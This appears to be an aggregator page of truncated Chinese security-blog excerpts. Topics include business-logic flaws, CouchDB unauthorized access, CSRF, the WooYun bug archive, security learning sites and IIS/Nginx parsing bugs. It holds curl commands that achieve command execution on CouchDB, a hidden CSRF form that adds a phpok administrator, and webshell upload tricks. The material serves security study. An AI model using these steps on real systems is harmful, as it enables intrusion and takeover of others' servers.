wooyun

业务安全漏洞挖掘归纳总结

大城市里の小女人 提交于 2020-04-07 10:07:06
摘要: 0x00 索引说明 6.30在OWASP的分享,关于业务安全的漏洞检测模型。进一步的延伸科普。 0x01 身份认证安全 1 暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方,使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http:/... 0x00 索引说明 6.30在OWASP的分享,关于业务安全的漏洞检测模型。进一步的延伸科普。 0x01 身份认证安全 1 暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方,使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http://zone.wooyun.org/content/20839 一些工具及脚本 Burpsuite htpwdScan 撞库爆破必备 URL: https://github.com/lijiejie/htpwdScan hydra 源码安装xhydra支持更多的协议去爆破 (可破WEB,其他协议不属于业务安全的范畴) 2 session & cookie类 会话固定攻击:利用服务器的session不变机制,借他人之手获得认证和授权,冒充他人。案例: WooYun: 新浪广东美食后台验证逻辑漏洞,直接登录后台,566764名用户资料暴露! Cookie仿冒

CouchDB 未授权访问漏洞

半城伤御伤魂 提交于 2020-02-24 21:16:04
0x00 CouchDB安装 CouchDB官方网站:http://couchdb.apache.org/ 一路Next直到完成安装,打开浏览器并访问以下链接:http://127.0.0.1:5984/ 可以使用以下网址与CouchDB Web界面进行交互:http://127.0.0.1:5984/_utils 0x01 漏洞利用 1、新增query_server配置,写入要执行的命令; curl -X PUT 'http://username:password@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"' 2、新建一个临时库和临时表,插入一条记录; curl -X PUT 'http://username:password@your-ip:5984/vultest' curl -X PUT 'http://username:password@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}' 3、调用query_server处理数据 curl -X POST 'http://username:password@your-ip:5984/vultest/_temp_view?limit=10' -d '

csrf学习笔记

你离开我真会死。 提交于 2020-01-17 16:30:48
  CSRF全称Cross Site Request Forgery,即跨站点请求伪造。我们知道,攻击时常常伴随着各种各样的请求,而攻击的发生也是由各种请求造成的。   CSRF攻击能够达到的目的是使受害者发出由攻击者伪造的请求。       CSRF能做的事情大概如下:   1)篡改目标网站上的用户数据;       2)盗取用户隐私数据;   3)作为其他攻击向量的辅助攻击手法;   4)传播CSRF蠕虫。    (1)版本4.2.100: 在phpok该版本的后台提交如下POST请求可以添加管理员: 1 POST /phpok/admin.php?c=admin&f=save HTTP/1.1 2 Host: www.goal.com 3 … 4 Cookie: … 5 (空一行) 6 id=…&accont=…&pass=…&status=…&if_system=… 由以上http头部可看出,此为添加管理员的请求,只有管理员能够执行。 攻击者可以构造如下页面: 1 <html> 2 <div style="display:none"> 3 <form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post"> 4 <input type="hidden

记录一次乌云漏洞裤搭建过程

爱⌒轻易说出口 提交于 2019-12-10 07:21:34
记录一次乌云漏洞裤搭建过程,分享给需要用到的朋友。 首先说明该漏洞库来源于乌云公开漏洞采集,由网友分享得此。网上也有一些网站已经提供了查询功能,那为啥还要自己在本地折腾搭建呢,大家都是明白人,就不说糊涂话,在互联网上你今天能看到的,未必明天还能看到。 1.对于本地搭建的用户完全可以将漏洞裤下载下来,然后进行抓取存入数据库,写个小脚本进行检索就可以了。在git上也有网友分享完整的虚拟机文件,可以直接下载下来接入使用。在服务器上下载,尤其是linux用户,在此记录下载过程。 chrome 安装 BaiduExporter 插件进行解析百度云盘资料地址。 拿到aria2c的下载地址后,直接用执行下载,没有aria2c的yum安装一下就行了。建议最好一次导出一个链接然后进行下载,下载完毕后,再重新获取链接下载,防止文件还没有下载完,cookie过期了。 aria2c -c -s10 -k1M -x10 -o "WEB安全/WooYun_Bugs(漏洞库)/readme.md" --header "User-Agent: netdisk;5.3.4.5;PC;PC-Windows;5.1.2600;WindowsBaiduYunGuanJia" --header "Referer: http://pan.baidu.com/disk/home" --header "Cookie:

业务安全漏洞挖掘归纳总结

六月ゝ 毕业季﹏ 提交于 2019-12-04 04:31:34
身份认证安全 1.暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方,使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http://zone.wooyun.org/content/20839 一些工具及脚本 描述 Burpsuite htpwdScan 撞库爆破必备 URL: https://github.com/lijiejie/htpwdScan hydra 源码安装xhydra支持更多的协议去爆破 (可破WEB,其他协议不属于业务安全的范畴) 2.session & cookie类 会话固定攻击:利用服务器的session不变机制,借他人之手获得认证和授权,冒充他人。案例:WooYun: 新浪广东美食后台验证逻辑漏洞,直接登录后台,566764名用户资料暴露! Cookie仿冒:修改cookie中的某个参数可以登录其他用户。 案例:益云广告平台任意帐号登录WooYun: 益云广告平台任意帐号登录 3.弱加密 未使用https,是功能测试点,不好利用。 前端加密,用密文去后台校验,并利用smart decode可解 业务一致性安全 1.手机号篡改 抓包修改手机号码参数为其他号码尝试,例如在办理查询页面,输入自己的号码然后抓包,修改手机号码参数为其他人号码,查看是否能查询其他人的业务。 2.邮箱或者用户篡改

网络安全学习和CTF必不可少的一些网站

耗尽温柔 提交于 2019-12-03 16:52:45
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0 安全编程方面的不太清楚,问问安全编程的表哥们吧QAQ 综合学习平台: http://edu.gooann.com/ 谷安网校 http://www.jikexueyuan.com/ 极客学院 http://www.hetianlab.com/ 合天 http://www.moonsos.com/ 米安网 http://www.ichunqiu.com/ i 春秋 http://www.honyaedu.com/ -红亚 http://www.baimaoxueyuan.com/ 白帽学院 http://www.simplexue.com/ctf/index 西普学院 http://www.imooc.com/course/list 慕课 http://www.secbox.cn/ 安全盒子 http://www.freebuf.com/ freebuf http://bobao.360.cn/ 360安全播报 http://www.wooyun.org/ 乌云 http://drops.wooyun.org/ 乌云知识库 http://wiki.wooyun

典型漏洞归纳之解析漏洞

百般思念 提交于 2019-12-03 15:44:43
0x00 总览说明 服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器(WEB server)的解析漏洞,比如IIS6.0、IIS7.5、apache、nginx等方便以后回顾温习。 一、IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 第二种,在IIS6.0下,分号后面的不被解析,也就是说 sp.asp;.jpg 会被服务器看成是sp.asp 还有IIS6.0 默认的可执行文件除了asp还包含这三种 /sp.asa /sp.cer /sp.cdx 二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞